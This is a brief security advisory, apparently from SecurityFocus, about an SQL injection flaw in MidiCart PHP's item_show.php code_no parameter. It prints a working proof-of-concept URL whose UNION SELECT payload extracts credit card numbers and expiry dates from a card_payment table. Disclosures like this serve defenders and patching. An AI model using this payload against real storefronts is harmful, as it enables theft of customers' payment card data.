MidiCart PHP Item_Show.PHP Code_No Parameter SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment


 

Privacy Statement
Copyright 2010, SecurityFocus